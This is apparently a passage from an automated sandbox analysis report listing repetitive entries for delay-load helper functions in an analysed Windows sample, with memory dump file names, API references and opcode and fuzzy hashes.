                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                            • Instruction ID: 210b3209b2953e72bdbdd12cac448a4a65eb3f3fd426ae025972661f6a2b3680
                                                            • Opcode Fuzzy Hash: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                            • Instruction Fuzzy Hash: C3B012D136D184AC3148710A2D02C3B014DC4C0B28330403FFA06C83C1D8406C003432
                                                            Function 00CDE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                            • Instruction ID: 68ad2d26d515abfb1113df245f46af68b0835b7b5727121a69d5c06e92129b8b
                                                            • Opcode Fuzzy Hash: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                            • Instruction Fuzzy Hash: 2FB012D135C244AC3144720A2E03C3B010CC0C0B28330803FFA09C83C1DC506D093432
                                                            Function 00CDE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                            • Instruction ID: f8ebe13bf0437518e251044e75e4b4b1b74865359203979adcbfb7aa4e50f3a9
                                                            • Opcode Fuzzy Hash: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                            • Instruction Fuzzy Hash: FEB012D135C384BC3184720A2D02C3B010CC0C0B28330813FFA09C83C1D8406C443432
                                                            Function 00CDE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                            • Instruction ID: 9112c38e77f2fb4c07a1a76bc15033dd5e2476c56a0965dca6cc3b7b70000c7e
                                                            • Opcode Fuzzy Hash: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                            • Instruction Fuzzy Hash: 8DB012E135C144BC3144710A2D02C3B010CC0C1F28330803FFF05C83C1D840AD003432
                                                            Function 00CDE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                            • Instruction ID: 365084fa6e0ffa1b7dfce38b91089cf8a259de41ceb4874cd3a6bddbee0dc96b
                                                            • Opcode Fuzzy Hash: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                            • Instruction Fuzzy Hash: 52B012E135C284BC3184710A2D02C3B010CC0C0F28330413FFB05C83C1D8406D403432
                                                            Function 00CDE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                            • Instruction ID: fcba007005f39ee154801e917e945b133638c910280025ad19bed176dec55e33
                                                            • Opcode Fuzzy Hash: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                            • Instruction Fuzzy Hash: 7DB012E135C144AC3144710B2D02C3B010CC0C0F28330403FFB05C83C1D8406D003432
                                                            Function 00CDE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                            • Instruction ID: 04cbd5e43457d847bde3d88b7d63d3b2372b01470eb145ab9c97750e7810127d
                                                            • Opcode Fuzzy Hash: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                            • Instruction Fuzzy Hash: 08B012E135C144AC3144710A2E03C3B010CC0C0F28330403FFB05C83C1DC406E013432
                                                            Function 00CDE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                            • Instruction ID: 0dd66c898d7a7d38e083d22871dabd9da1c95a6f9295d7440b493458543b6859
                                                            • Opcode Fuzzy Hash: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                            • Instruction Fuzzy Hash: 45B012E139C154BC3244B1092E02C37024CC5C0B14330C03FFB04C93C0D8404C042433
                                                            Function 00CDE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                            • Instruction ID: 0f9f964a9eaeead3f30d1b09614bf2daa097ae9cd16a2bb46b52704b6c9b14ef
                                                            • Opcode Fuzzy Hash: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                            • Instruction Fuzzy Hash: 2AB012E139C1547C324471092F02C37024CC4C0B14330C03FF704D93C0D8400C092433
                                                            Function 00CDE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                            • Instruction ID: 6aa3e0472f04e0bc3b12ce9d487fc5b8bf1f68f8a2c592f478a55009a72c2b3e
                                                            • Opcode Fuzzy Hash: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                            • Instruction Fuzzy Hash: 8AB012F139C054BC3244B1096E02C37024CC5C0F14330803FFB04C93C0D8444E002433
                                                            Function 00CDE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                            • Instruction ID: 51b04d439dc282cd60ec641f6f5472eaec988e42e98ea4f9f6030bf7e587a752
                                                            • Opcode Fuzzy Hash: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                            • Instruction Fuzzy Hash: BCB012C135C1587E3144B25A3D42C37011CC4C0B19330413FF604C93C0F8400C102432
                                                            Function 00CDE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                            • Instruction ID: 026f5336c5e159d15af7b1c95a0cdd375be9ed83bc01ae4dc7e5b43bd6cbf941
                                                            • Opcode Fuzzy Hash: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                            • Instruction Fuzzy Hash: 20B012C175C1547C3144B15A7E43C37012CC4D0B19330423FF604C93C0FC400D112432
                                                            Function 00CDE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                            • Instruction ID: d63a90cb83e5a700623de1a181942a44534b7fa04c82cc622b8972d2e63a435b
                                                            • Opcode Fuzzy Hash: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                            • Instruction Fuzzy Hash: 95B012C135C2547C3184B15A7D43C37012CC4D0B19330423FF604C93C0F8400C502432
                                                            Function 00CDE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                            • Instruction ID: 4edc2b211c1d517db0808f51904492a1d50d3363f06a74a664135d2c00720351
                                                            • Opcode Fuzzy Hash: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                            • Instruction Fuzzy Hash: 13B09281258145BC224461096E02C3A0118C091B18320422BB604C8280A8400C442436
                                                            Function 00CDE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
